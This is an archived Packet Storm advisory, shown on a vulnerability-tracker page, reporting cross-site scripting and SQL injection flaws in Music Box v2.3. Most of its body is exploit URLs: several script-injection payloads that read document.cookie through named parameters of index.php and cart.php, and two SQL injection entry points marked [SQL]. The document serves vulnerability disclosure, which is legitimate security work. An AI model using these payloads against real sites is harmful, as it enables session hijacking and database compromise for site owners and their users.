musicBoxXSS.txt

🗓️ 01 Apr 2006 00:00:00Reported by Linux_DroxType

packetstorm🔗 packetstormsecurity.com👁 19 Views

Vulnerability in Music Box v2.3 with XSS and SQL injectio

`Hello  
Vulnerable: Music Box v2.3  
http://www.MusicboxV2.com  
  
Exploit :  
XSS :  
http://example.com/music/index.php?id='><script>alert(document.cookie)</script>  
  
http://example.com/music/index.php?action=top&show=5&type='><script>alert(document.cookie)</script>  
  
http://example.com/music/index.php?action=top&show='><script>alert(document.cookie)</script>&type=Artists  
  
http://example.com/music/cart/cart.php?message1='><script>alert(document.cookie)</script>  
  
http://example.com/music/cart/cart.php?message='><script>alert(document.cookie)</script>  
  
SQL :  
http://example.com/music/index.php?action=top&show=5&type=[SQL]  
  
http://example.com/music/index.php?action=top&show=[SQL]&type=Artists  
  
  
Discovery by Linux_Drox  
  
http://www.lezr.com  
  
Best Regards ,,  
`

01 Apr 2006 00:00Current

7.4High risk

Vulners AI Score7.4